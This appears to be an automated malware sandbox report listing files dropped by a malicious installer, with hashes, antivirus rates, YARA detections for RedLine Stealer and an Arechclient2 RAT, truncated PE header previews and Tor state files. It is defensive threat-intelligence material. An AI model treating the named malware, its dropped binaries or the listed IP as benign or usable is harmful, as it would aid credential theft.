Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\L8WUDDQ8.htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe
File Type:	HTML document, ASCII text, with no line terminators
Category:	dropped
Size (bytes):	91
Entropy (8bit):	4.745401272671828
Encrypted:	false
SSDEEP:	3:w+u7F6nmqDISLi9KYLGGHuK0HXb:wH7FULLi9KmGFb
MD5:	6CDA7D67D51D07AFE8AA43223A04BEFF
SHA1:	F86571424DFD82F6FBF7F86C36F5107442028CF3
SHA-256:	E74F2B0E1F60C5A66256A63BD889EBA0D522E95447723FB49FCF0E4743CC6E19
SHA-512:	5023A91AAD2B8A36D26AD0F02C47B1B0365907DEF113F66619F3967437476DA89829716921D7F90711F088B0607BBA1E23CE919AF23CD9398741F764FC1B99BA
Malicious:	false
Preview:	<head><body> This object may be found <a HREF="https://www.zonealarm.com/">here</a> </body>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\PZYN8274.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	15
Entropy (8bit):	2.282588730501833
Encrypted:	false
SSDEEP:	3:MXgMgQXK:MwMgCK
MD5:	7EC97BF013D62C471828258E8BE69452
SHA1:	44DC0D29206C430C229B2DEADE360C8608E01122
SHA-256:	FACBED200D57C4C0015A496CA795D2A84BF295DC6BC9E1B2C5CBFD9F2A6F29AE
SHA-512:	1DD4EBEDE8EAEF235B0486C6C7AE010839558C005FE459E641537AAB7662D882ABC50AFF0B23096636A308938ED2C17BBDC600206E0B8FAB422D983F5C18A7E0
Malicious:	false
Preview:	102.129.152.212

C:\Users\user\AppData\Local\Temp\16E6.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1031168
Entropy (8bit):	7.813165465236248
Encrypted:	false
SSDEEP:	24576:dF8Ns4dfIGdXrAclSoBibYmgODCNbGl0a0Utwo5u1zAraf:dF8aEfIG7f5BgY1NGlZ5af
MD5:	54B4A6C4422FD983F901A346072DC89F
SHA1:	9C46745462664735ED58E13AAA6B016212E9DF30
SHA-256:	E1842FA8F67B5295C3A3CF2246A13A03A548FBD53C1510F34C62ABFDA758FE22
SHA-512:	81677E35A197C09CF1B570C20FB0D8B53B217DE5C3824EE4B05BD95F6B29EBDCE0C5294689B16FFF31A0959CE0C1510864438BCC0DC22800CFCB855F1358FD42
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 43%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F..'...'...'...u..'...u;..'...u-.3'......'...'..;'...u$..'...u:..'...u?..'..Rich.'..................PE..L....."d.................,..........p........@....@..................................l......................................,m..P........'..................................................(e.......d..@............@..$............................text...........,.................. ..`.rdata...9...@...:...0..............@..@.data....W.......$...j..............@....tls................................@....moye...A...........................@....rsrc...........(..................@..@........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1C75.dll

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2248704
Entropy (8bit):	7.9527091677264865
Encrypted:	false
SSDEEP:	49152:3Pe64QPWXkoWrcd8YruCJfdEtH95PlOYSm/0VLDm3t://4QiHBruPHX9hSHG3t
MD5:	816C2621A2C1F6478F41BBC0C9C01780
SHA1:	ED1263567F0B28109776A58F0E878DFAA28DBD4D
SHA-256:	E5C372700FB46104F0C456F7DDAD89475EB1EECAC2F7D9849CEABD431249DEA0
SHA-512:	DD8704DDF76EDABC17209E04A127D950EF986A220C23A61CF5FC84A6666E9AC265B508090CB80074C4897D22197EF5AAA4F082F961ED2555D2A8E21AE184951C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 59%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........w....`...`...`..n...`...a...`...`...`..n...`..n...`..n...`.Rich..`.........................PE..L....o.T...........!.....0....,..F..P........@...............................`"............@........................(.................!.......................!.l....................................................@..............................Lny6jo2..(.......0.................. ..`.rdata.......@.......@..............@..@.data....a.......`..................@...yvQ......j...`...p...P..............@...c83H3w4tz...........................@....rsrc.........!.......!................@.reloc........!.......!.............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\23F8.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2774960
Entropy (8bit):	7.892404647515567
Encrypted:	false
SSDEEP:	49152:Rj5JtdyllnbHOWkfhdVCGort+k6HRzgiXonaCV31WsowgGlbjYMskeLX6+n11:R1JtdyllnbHOpJqrt+LR9YVVFkwgGZ3O
MD5:	C34C5873CC37033CF7A75A400BB50B1A
SHA1:	1D3A85F467E43ECD307B73C8B205BBCF24CF11F1
SHA-256:	4961C88867E2D9DAABDFA17BB19E0070A521D30D32D4A431ED561B0DC5D83A5A
SHA-512:	9832C56F974F4488AA8CE5379B71738C61DC9A9C3E6B5A429A58F097AB53398AA2D436252B540C51B3834C09CFAC5809D59CCEA3C5970928EDE51D4407997FBB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....e............................v.!...........@...........................@......y...@..................................P..d....`=.._..............C...@=......................................................0..4............................text............................... ..`.rdata..J4... ......................@..@.data...dX...`......................@....vmp..ld.......................... ..`.vmp.......0......................@....vmp....&..@....&................. ..`.reloc.......@=.......'.............@..@.rsrc...._...`=.......'.............@..@........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\3ABE.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4425080
Entropy (8bit):	7.981464738248495
Encrypted:	false
SSDEEP:	98304:LF6mYe92yaRlXabps7m9EsVfXWt3CTqFMQM/avj:4mYE1aR9alsi5xGxXFcm
MD5:	1894F7AA0F57BEC640F13E2EC87840E1
SHA1:	87A64FDDCF3A792F5C07F1E940A654E12792F780
SHA-256:	7E196845E76B541A54944C07C6C65913F86715BD5E0F87943C109AA4B4BF1362
SHA-512:	C232A0FBB57532384D217C034B466E179C7D4DBE688BF6E630AE34BAA2259EAAD0616D359A32799BDF03723C0D8AC904626888B4F677E8519346F41C32A316A9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 46%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................................P............Y.......................Rich...................PE..L...2*.b..................A..........!........A...@.................................u.D.....................................,.B.P.....B.h7...........zC.x.............................................................A.$............................text.....A.......A................. ..`.rdata...9....A..:....A.............@..@.data....h...0B..&....B.............@....viji...A.....B......>B.............@....rsrc...h.O...B..8...BB.............@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\28CC.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	834048
Entropy (8bit):	6.808387997794574
Encrypted:	false
SSDEEP:	12288:7dLwWCn3QrAIsj0AQ1i7x4oiuoorWv4BqUPCdYCGaa:i3QejkE7x4NorNqtdGaa
MD5:	F94B2515B62B2EE2A9A07F2747C283EC
SHA1:	2AEC647AEEF97B7D2008071947A7013814631D41
SHA-256:	34D771BFE5BF29AA80E2ABC9AF6840D8D4F1F5F27451963CF834F3D34AAE6B3A
SHA-512:	6F067A1B1F6F9E5950120B6F9258EBF2DF01D14DA702848A448F7734BCB39CDC642A2D0163839F812293FB40FA655F01B741551F778B68DBEE7E06387AFA36B9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\28CC.exe, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\28CC.exe, Author: Joe Security Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\28CC.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....We............................>.... ........@.. ....................... ..................................................K.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........`F...... ...0X...............................................0..............X...%-.&sp...sq...}-..... '...X.~\|.... /...Y.).... .....=...%.....~z.... +...Y.)....sr...~\|.... ....Y.)....os.........%.~t.... ....X .... "...a~t.....dX(.....%.~\|.... -...Y.)......~\|.... ,...Y.)....~0...%-.&~/.........su...%.0...(...+}.....0............@X..{M....0............(.......... ._..X. ... X..d.b3.+.~t.... 3h..X+.~t.... .+IWX.. :...\ ....a...+. 0Iu. .YQ.a+M .... ?....`_ ....3.+.~

C:\Users\user\AppData\Local\Temp\3ABE.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	7079936
Entropy (8bit):	7.9831682035345874
Encrypted:	false
SSDEEP:	196608:tvt0kQnhCtKZSqNcg7xAtipQrBiS9cWzAY5do:trmhCfqNDtAtUQdiS9cWzDK
MD5:	3954CC01C26D1962284F3B95602F2367
SHA1:	6C9B061C4971E9C925D1303C42241A629DA7BE93
SHA-256:	8C887835F3B1861776B4D88A9C47DBE945DCADFD881B4AE9909488C022924CF6
SHA-512:	F0A43268C0B7C30B030DB0789D699452D2829C6CA3CB9523CE2302EE78C02FB4CE634D136F8EBA2409A227D4111B59DB5C1A3B2ED8C5FA6D97D118A23430DD45
Malicious:	true
Yara Hits:	Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\3ABE.exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 73%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e..................k...........l.. ... l...@.. .......................`l...........@.................................T.l.W.... l.H....................@l...................................................... ............... ..H............text.....k.. ....k................. ..`.rsrc...H.... l.......l.............@..@.reloc.......@l.......l.............@..B..................l.....H.......\|.l..............'....k..........................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,

C:\Users\user\AppData\Local\Temp\4KPV6A~1\cached-certs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\820.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	20852
Entropy (8bit):	6.05147791645295
Encrypted:	false
SSDEEP:	384:fd4AW9V9hC1hIhc2q48XVd91hMB2h4YVc1h1yd24ZFtVf1hc1xtMY4QkV6icO1h3:FrqvUg8nX986xyh62M1uxRBkoicOaqbT
MD5:	9868B38B4913891F160E9C7F92FBE151
SHA1:	B10F812409977BD796AEACC6431FBB6610051AEC
SHA-256:	4089BF5CFF4747D6FDB811203D77390295943882E004EA8991541D4344C7BA15
SHA-512:	59F05BE9F3A9E781B662A605F72D2FB05CDD5C451142A6F7112F7F93DCFA44370CCCCE051CDD86E61E17AFC30197832E05C84A724175254DAF848AAEBC640EE5
Malicious:	false
Preview:	dir-key-certificate-version 3..fingerprint 14C131DFC5C6F93646BE72FA1401C02A8DF2E8B4..dir-key-published 2023-11-01 00:00:00..dir-key-expires 2024-05-01 00:00:00..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEA7cZXvDRxfjDYtr9/9UsQ852+6cmHMr8VVh8GkLwbq3RzqjkULwQ2..R9mFvG4FnqMcMKXi62rYYA3fZL1afhT804cpvyp/D3dPM8QxW88fafFAgIFP4LiD..0JYjnF8cva5qZ0nzlWnMXLb32IXSvsGSE2FRyAV0YN9a6k967LSgCfUnZ+IKMezW..1vhL9YK4QIfsDowgtVsavg63GzGmA7JvZmn77+/J5wKz11vGr7Wttf8XABbH2taX..O9j/KGBOX2OKhoF3mXfZSmUO2dV9NMwtkJ7zD///Ny6sfApWV6kVP4O9TdG3bAsl..+fHCoCKgF/jAAWzh6VckQTOPzQZaH5aMWfXrDlzFWg17MjonI+bBTD2Ex2pHczzJ..bN7coDMRH2SuOXv8wFf27KdUxZ/GcrXSRGzlRLygxqlripUanjVGN2JvrVQVr0kz..pjNjiZl2z8ZyZ5d4zQuBi074JPGgx62xAstP37v1mPw14sIWfLgY16ewYuS5bCxV..lyS28jsPht9VAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEA8geDeHGGKz9KWL3P+e0266XvTijpqR1Vn3etVa8mvDB9T1MGy/FU..oHAS0b/PfM+SyqlcQJm/GSczhs9E+wDjOigc1bIfpRc1eyn11o0k8mPo6Dj68dHV..X0eH8IAlrMZo/O7ZjaLw4CK5yuQ/

C:\Users\user\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\820.exe
File Type:	ASCII text, with very long lines (1006)
Category:	dropped
Size (bytes):	2864083
Entropy (8bit):	5.611777754537046
Encrypted:	false
SSDEEP:	12288:88HOVxuKmnjWaKra126wGBuotcs5d+9vtBZKlaB1fI5OISL2WNeoyJ4LI:89Duxqal1QotcCs5oa7GylyJ4E
MD5:	6A5FEAA08D7082781F7B6DE5A1BFC4D4
SHA1:	53C6E057E64BC916132F669832200C26957E6F52
SHA-256:	FAAA01E55523AA8EBB300FCB30042D752CB290618CDE987561559679A2B8C66F
SHA-512:	04A6B1D91C8D3B274C32CD659D41569CB04509F985F6B9F3419A3B70996A17A9400F5181D34D3D55C3C26B804A0B716621F33D87B61B41BBDF654E9FD7E15A8C
Malicious:	false
Preview:	network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-12-24 09:00:00.fresh-until 2023-12-24 10:00:00.valid-until 2023-12-24 12:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.require

C:\Users\user\AppData\Local\Temp\4KPV6A~1\state (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\820.exe
File Type:	ASCII text, with very long lines (350), with CRLF line terminators
Category:	dropped
Size (bytes):	3892
Entropy (8bit):	5.313259409881364
Encrypted:	false
SSDEEP:	96:oPvKdnakl99SMyIW3e0kAOIJhx09hwXOkun:NB07bXG
MD5:	F5B5EF17C718A86A22F18657A6DCA299
SHA1:	DEF62C2764755340E11FACC6B8E5445787B893E6
SHA-256:	C98E8D7F3810A1F93E4609E39F1447835763FC31C2CD452852A2146DF3941C9B
SHA-512:	6A305A217869C9A1AAAE5E19C4BDE752BD3D53518F34A63AD66D953C82A1BE4BAE5A2B07CD7CFBC8234AFC9F2E78237F59434348142D6A8D7FD8070591A2BF2E
Malicious:	false
Preview:	# Tor state file last generated on 2023-12-24 10:51:50 local time..# Other times below are in UTC..# You do not need to edit this file.....CircuitBuildTimeBin 975 1..CircuitBuildTimeBin 1025 1..CircuitBuildTimeBin 1125 1..CircuitBuildTimeBin 1625 1..CircuitBuildTimeBin 1775 1..CircuitBuildTimeBin 1825 1..CircuitBuildTimeBin 2575 1..CircuitBuildTimeBin 5325 1..CircuitBuildTimeBin 16525 2..CircuitBuildTimeBin 17025 2..CircuitBuildTimeBin 17275 1..Dormant 0..Guard in=default rsa_id=F5136AE56909D48EBDE8EE2B0F230CD93AD91FF4 nickname=torious sampled_on=2023-12-17T06:26:19 sampled_idx=0 sampled_by=0.4.4.9 listed=1..Guard in=default rsa_id=A2F456206713EC7ED212D9E85C5DEB649980862E nickname=arpagic1 sampled_on=2023-12-17T17:20:16 sampled_idx=1 sampled_by=0.4.4.9 listed=1 confirmed_on=2023-12-21T13:40:32 confirmed_idx=0 pb_use_attempts=2.000000 pb_use_successes=2.000000 pb_circ_attempts=13.000000 pb_circ_successes=13.000000 pb_successful_circuits_closed=13.000000..Guard in=default rsa_id=07DA59

C:\Users\user\AppData\Local\Temp\4KPV6A~1\unverified-microdesc-consensus (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\820.exe
File Type:	ASCII text, with very long lines (1006)
Category:	dropped
Size (bytes):	2864083
Entropy (8bit):	5.611777754537046
Encrypted:	false
SSDEEP:	12288:88HOVxuKmnjWaKra126wGBuotcs5d+9vtBZKlaB1fI5OISL2WNeoyJ4LI:89Duxqal1QotcCs5oa7GylyJ4E
MD5:	6A5FEAA08D7082781F7B6DE5A1BFC4D4
SHA1:	53C6E057E64BC916132F669832200C26957E6F52
SHA-256:	FAAA01E55523AA8EBB300FCB30042D752CB290618CDE987561559679A2B8C66F
SHA-512:	04A6B1D91C8D3B274C32CD659D41569CB04509F985F6B9F3419A3B70996A17A9400F5181D34D3D55C3C26B804A0B716621F33D87B61B41BBDF654E9FD7E15A8C
Malicious:	false
Preview:	network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-12-24 09:00:00.fresh-until 2023-12-24 10:00:00.valid-until 2023-12-24 12:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.require

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-certs.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\820.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	20852
Entropy (8bit):	6.05147791645295
Encrypted:	false
SSDEEP:	384:fd4AW9V9hC1hIhc2q48XVd91hMB2h4YVc1h1yd24ZFtVf1hc1xtMY4QkV6icO1h3:FrqvUg8nX986xyh62M1uxRBkoicOaqbT
MD5:	9868B38B4913891F160E9C7F92FBE151
SHA1:	B10F812409977BD796AEACC6431FBB6610051AEC
SHA-256:	4089BF5CFF4747D6FDB811203D77390295943882E004EA8991541D4344C7BA15
SHA-512:	59F05BE9F3A9E781B662A605F72D2FB05CDD5C451142A6F7112F7F93DCFA44370CCCCE051CDD86E61E17AFC30197832E05C84A724175254DAF848AAEBC640EE5
Malicious:	false
Preview:	dir-key-certificate-version 3..fingerprint 14C131DFC5C6F93646BE72FA1401C02A8DF2E8B4..dir-key-published 2023-11-01 00:00:00..dir-key-expires 2024-05-01 00:00:00..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEA7cZXvDRxfjDYtr9/9UsQ852+6cmHMr8VVh8GkLwbq3RzqjkULwQ2..R9mFvG4FnqMcMKXi62rYYA3fZL1afhT804cpvyp/D3dPM8QxW88fafFAgIFP4LiD..0JYjnF8cva5qZ0nzlWnMXLb32IXSvsGSE2FRyAV0YN9a6k967LSgCfUnZ+IKMezW..1vhL9YK4QIfsDowgtVsavg63GzGmA7JvZmn77+/J5wKz11vGr7Wttf8XABbH2taX..O9j/KGBOX2OKhoF3mXfZSmUO2dV9NMwtkJ7zD///Ny6sfApWV6kVP4O9TdG3bAsl..+fHCoCKgF/jAAWzh6VckQTOPzQZaH5aMWfXrDlzFWg17MjonI+bBTD2Ex2pHczzJ..bN7coDMRH2SuOXv8wFf27KdUxZ/GcrXSRGzlRLygxqlripUanjVGN2JvrVQVr0kz..pjNjiZl2z8ZyZ5d4zQuBi074JPGgx62xAstP37v1mPw14sIWfLgY16ewYuS5bCxV..lyS28jsPht9VAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEA8geDeHGGKz9KWL3P+e0266XvTijpqR1Vn3etVa8mvDB9T1MGy/FU..oHAS0b/PfM+SyqlcQJm/GSczhs9E+wDjOigc1bIfpRc1eyn11o0k8mPo6Dj68dHV..X0eH8IAlrMZo/O7ZjaLw4CK5yuQ/

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-microdesc-consensus.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\820.exe
File Type:	ASCII text, with very long lines (1006)
Category:	dropped
Size (bytes):	2864083
Entropy (8bit):	5.611777754537046
Encrypted:	false
SSDEEP:	12288:88HOVxuKmnjWaKra126wGBuotcs5d+9vtBZKlaB1fI5OISL2WNeoyJ4LI:89Duxqal1QotcCs5oa7GylyJ4E
MD5:	6A5FEAA08D7082781F7B6DE5A1BFC4D4
SHA1:	53C6E057E64BC916132F669832200C26957E6F52
SHA-256:	FAAA01E55523AA8EBB300FCB30042D752CB290618CDE987561559679A2B8C66F
SHA-512:	04A6B1D91C8D3B274C32CD659D41569CB04509F985F6B9F3419A3B70996A17A9400F5181D34D3D55C3C26B804A0B716621F33D87B61B41BBDF654E9FD7E15A8C
Malicious:	false
Preview:	network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2023-12-24 09:00:00.fresh-until 2023-12-24 10:00:00.valid-until 2023-12-24 12:00:00.voting-delay 300 300.client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13,0.4.7.14,0.4.7.15,0.4.7.16,0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.require

C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-microdescs.new

Download File

Process:	C:\Users\user\AppData\Local\Temp\820.exe
File Type:	ASCII text, with very long lines (12354)
Category:	modified
Size (bytes):	22158969
Entropy (8bit):	4.815251200644682
Encrypted:	false
SSDEEP:	24576:0B/yOYPxgqWdLDQ2+M/6OhT/j4MYuCGRltjipZYLXa+WoRnNFNmaXOnvxbVNc3Va:6Hj34jcKfrQ+JLlSOBedIH
MD5:	2729C9B817A8677564246D78017387A8
